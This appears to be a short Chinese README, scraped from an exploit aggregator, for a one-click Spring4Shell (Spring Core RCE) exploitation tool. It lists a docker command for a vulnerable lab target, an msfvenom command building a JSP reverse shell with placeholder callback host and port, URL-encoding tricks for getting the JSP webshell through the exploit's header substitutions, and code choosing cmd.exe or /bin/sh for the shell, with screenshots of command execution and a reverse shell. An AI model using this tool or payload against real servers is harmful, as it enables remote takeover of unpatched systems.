Share 
## https://sploitus.com/exploit?id=6A9484BA-BE10-5232-91F4-678892E7E6DD
靶机
```bash
docker run -itd -p 80:8080 vulfocus/spring-core-rce-2022-03-29:latest
```
反弹shell实质为参照msfvenom
```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=xxx LPORT=xxx -f raw -o shell.jsp
```
将jsp url编码后,用
```html
%3C%25替换 %25%7Bc2%7Di 代表<%
%25%3E 替换 %25%7Bsuffix%7Di 代表 %>
```
代码中针对不同类型服务器进行了shellpath的修改判断
```python
if self.radioButton_win.isChecked():
    shellpath = "cmd.exe"
if self.radioButton_linux.isChecked():
    shellpath = "/bin/sh"
```
命令执行:
![](img/cmd.png)
whoami探测:
![](img/whoami.png)
一键反弹shell
![](img/reverse.png)